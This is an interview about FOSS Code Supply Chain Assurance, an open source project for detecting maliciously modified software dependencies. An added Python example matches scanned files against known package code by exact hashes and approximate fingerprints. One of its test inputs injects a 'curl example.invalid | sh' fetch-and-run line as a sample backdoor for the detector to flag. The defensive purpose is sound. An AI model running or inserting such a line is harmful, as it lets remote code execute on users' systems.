Philippe Ombredanne - FOSS Code Supply Chain Assurance
Mitigate attacks through software dependencies
Software engineering, protocols, cryptography
Can you introduce yourself and your project?
I'm Philippe Ombredanne and I'm on a mission to make it easier and safer to reuse FOSS code. I am the lead maintainer of AboutCode. We build best-in-class open source Software Composition Analysis (SCA) tools, open data, and community standards for open source discovery, licence, and security compliance.
FOSS Code Supply Chain Assurance mitigates attacks from malicious modifications of software dependencies in the open source package supply chain. This free and open source software (FOSS) project is building a new system to verify the integrity of deployed code packages and validate their origin with external data sources, such as detecting if a package in use matches verified or known code by mapping source and binaries exactly and approximately.
What are the key issues you see with the state of the internet today?
Security is the problem. The status quo of fast and easy communication and freely sharing private data means malicious cybersecurity attacks can cause more damage with the accessible data.
The internet was built, developed, and expanded thanks to free and open source software (FOSS). The explosion of FOSS usage across everything digital means it is very easy for developers to consume, provision, integrate and reuse FOSS. A sophisticated malware attack on FOSS can be disastrous for developers and users, companies and countries, industries and sectors, with several of these attacks, like the xz-utils backdoor, unleashing mayhem on business and society in recent years.
Securing all the FOSS packages reused is a critical issue with the current state of the internet today.
How does your project contribute to correcting some of those issues?
Software is built with components. Each and every software application includes FOSS components. This enabled – and continues to enable – software to eat the world because open source libraries and packages are easy to download and install – a programmer could install hundreds in seconds.
The difficulty is providing assurance that the downloaded components aren't viruses, malware, or trojans. Since there is little friction for consuming, downloading, and reusing FOSS, developers might not know exactly what those packages are – and that opens up potential for bad actors and malevolent attacks.
FOSS Code Supply Chain Assurance identifies what software is made of. The project scans code to observe and recognize distinguishing features, and then matches the code against databases of those features to identify outliers or red flags.
As a FOSS project to improve the security of FOSS packages, FOSS Code Supply Chain Assurance ensures that the different FOSS components used in various software are genuine.
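As an added illustration of the "scan for distinguishing features, then match against a database" approach described in this answer, the following Python script implements both kinds of matching on a small scale: an exact match on a normalized SHA-256 of each file, and an approximate match on winnowed k-gram token fingerprints compared by Jaccard similarity, so that a lightly modified copy of known code is flagged as a modified copy rather than as unknown. This is example code written for this page, not AboutCode, ScanCode or MatchCode code. The k-gram size, winnowing window, similarity threshold, the purl-style package identifier and all sample sources are assumptions constructed for the demonstration.

```python
"""Exact and approximate matching of scanned files against known package code.
Illustrative code for this page; parameters and sample data are assumptions."""
import hashlib
import re
from dataclasses import dataclass

K = 4                    # tokens per k-gram (assumed parameter)
W = 4                    # winnowing window in k-grams (assumed parameter)
APPROX_THRESHOLD = 0.5   # minimum Jaccard similarity reported as approximate (assumed)
TOKEN_RE = re.compile(r"\w+|[^\w\s]")


def normalize(text: str) -> str:
    """Canonicalize line endings and per-line whitespace so cosmetic edits
    (CRLF, trailing spaces, re-indentation) do not defeat exact matching."""
    lines = (ln.strip() for ln in text.replace("\r\n", "\n").split("\n"))
    return "\n".join(ln for ln in lines if ln)


def exact_hash(text: str) -> str:
    """Exact feature: SHA-256 of the normalized file."""
    return hashlib.sha256(normalize(text).encode("utf-8")).hexdigest()


def _gram_hash(tokens) -> int:
    digest = hashlib.blake2b(" ".join(tokens).encode("utf-8"), digest_size=8).digest()
    return int.from_bytes(digest, "big")


def fingerprints(text: str) -> frozenset:
    """Approximate feature: winnowed k-gram hashes. Each window of W consecutive
    k-gram hashes contributes its minimum, so a local edit only disturbs the
    fingerprints near that edit and the rest of the file still matches."""
    tokens = TOKEN_RE.findall(normalize(text))
    grams = [_gram_hash(tokens[i:i + K]) for i in range(len(tokens) - K + 1)]
    if len(grams) <= W:
        return frozenset(grams)
    return frozenset(min(grams[i:i + W]) for i in range(len(grams) - W + 1))


def jaccard(a: frozenset, b: frozenset) -> float:
    return len(a & b) / len(a | b) if (a or b) else 0.0


@dataclass(frozen=True)
class KnownFile:
    package: str      # package identity, written as a purl-style string (assumed data)
    path: str
    sha256: str
    fps: frozenset


def build_index(known: dict) -> list:
    """known: {package: {path: source}} -> precomputed exact and approximate features."""
    return [KnownFile(pkg, path, exact_hash(src), fingerprints(src))
            for pkg, files in known.items() for path, src in files.items()]


def match(content: str, index: list) -> dict:
    """Classify one scanned file: exact (known code), approximate (a modified
    copy of known code, a red flag worth inspecting) or unknown (no known origin)."""
    h = exact_hash(content)
    for kf in index:
        if kf.sha256 == h:
            return {"kind": "exact", "package": kf.package, "path": kf.path, "similarity": 1.0}
    fps = fingerprints(content)
    best, best_sim = None, 0.0
    for kf in index:
        sim = jaccard(fps, kf.fps)
        if sim > best_sim:
            best, best_sim = kf, sim
    if best is not None and best_sim >= APPROX_THRESHOLD:
        return {"kind": "approximate", "package": best.package, "path": best.path,
                "similarity": best_sim}
    return {"kind": "unknown", "package": None, "path": None, "similarity": best_sim}


# Constructed reference source for a hypothetical package (not a real project).
KNOWN_HEADERS_PY = '''
import json

def parse_header(line):
    name, _, value = line.partition(":")
    return name.strip().lower(), value.strip()

def parse_headers(lines):
    return dict(parse_header(line) for line in lines if ":" in line)

def has_header(headers, name):
    return name.lower() in headers

def header_value(headers, name, default=None):
    return headers.get(name.lower(), default)

def dump_headers(headers):
    return json.dumps(headers, sort_keys=True)
'''
KNOWN_PACKAGES = {"pkg:pypi/headerkit@1.2.0": {"headerkit/parse.py": KNOWN_HEADERS_PY}}

# Constructed scan inputs: a cosmetically altered copy, a copy with one injected
# statement (the shape of modification a backdoor introduces), and an unrelated file.
SCANNED = {
    "vendor/parse.py": KNOWN_HEADERS_PY.replace("\n", "\r\n").replace("    ", "\t"),
    "vendor/parse_tampered.py": KNOWN_HEADERS_PY.replace(
        "def parse_headers(lines):\n",
        'def parse_headers(lines):\n    __import__("os").system("curl example.invalid | sh")\n'),
    "vendor/build.sh": "#!/bin/sh\nset -eu\nmake clean\nmake all\n"
                       "install -m 0755 app /usr/local/bin/app\n",
}


def scan(scanned: dict, known: dict) -> dict:
    index = build_index(known)
    return {path: match(content, index) for path, content in scanned.items()}


if __name__ == "__main__":
    for path, r in scan(SCANNED, KNOWN_PACKAGES).items():
        print(f"{path}: {r['kind']} {r['package'] or ''} ({r['similarity']:.2f})")
```

Running the script reports the re-indented copy as an exact match, the copy with the injected statement as an approximate match with a similarity well below 1.0, and the shell script as unknown. The approximate result is the one a reviewer cares about: it says "this is package X, but not byte-for-byte", which is exactly the case where a diff against the known original is worth producing.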
What do you like most about (working on) your project?
There are many, many different ways to build software, like applications, operating systems, and libraries. We build tools for software developers to make it easier and safer to reuse FOSS code.
With a project like FOSS Code Supply Chain Assurance, we are proud to help others do the right thing. The best part about working on this project is being part of the vibrant open source community sharing feedback, values, and ideals.
Where will you take your project next?
Our goal is to build the best tools as free and open source software. We are working on automating more software composition analysis to improve the accuracy of the detected code origin and identify more injected scripts from malicious actors, and building apps to manage the process and mitigate the vulnerabilities uncovered.
We plan to continue to provide best-in-class reference data for software licences, packages, and vulnerabilities to build a true internet commons that can benefit everyone. With new regulations for software development around product liability and cybersecurity like the EU Cyber Resilience Act (CRA), the EU Product Liability Directive (PLD), and US Executive Order 14028, we need to ensure our tools can enable others to build software (and more FOSS) more efficiently with minimal friction from these regulations – all while improving their security posture.
How did NGI Assure help you reach your goals for your project?
NGI grants – and especially the one from NGI Assure – helped us realize our vision and develop our tools. These tools and standards are now used in almost every software organization across the world, and especially in Europe.
Cascade grants from NGI are essential support for open source innovation on software development to build a better and more open internet.
Do you have advice for people who are considering applying for NGI funding?
NGI is a unique program to develop solutions. Your skills, competencies, knowledge, and passion to deliver open source are what matters, unlike traditional funding programs designed exclusively for researchers and academics.
My advice is to cultivate your passion and focus on innovation. And even if your submission is not accepted, the expert feedback is invaluable to continue developing your ideas and submit again for the next open call.
Do you have any recommendations to improve future NGI programmes or the wider NGI initiative?
Cascade funding with small grants is wonderful and extremely powerful. These small investments for big results reach a wider audience that doesn't always benefit from traditional grants. This has also proven to promote important open source initiatives.
With FOSS being free, the difficulty is sustained funding for sustained innovation. Software maintenance is not always exciting work, but it is essential for the long-term success of FOSS initiatives.
Larger, long-term grants for successful, responsible grantees will expand the impact of the initial deliverable and provide more support for long-term maintenance, visibility, and sustainability.
Acknowledgements
Image: courtesy of Philippe Ombredanne.
Published on September 17, 2024
FOSS Code Supply Chain Assurance received funding through the NGI Assure Fund, a fund established by NLnet with financial support from the European Commission's Next Generation Internet programme, under the aegis of DG Communications Networks, Content and Technology under grant agreement No 957073.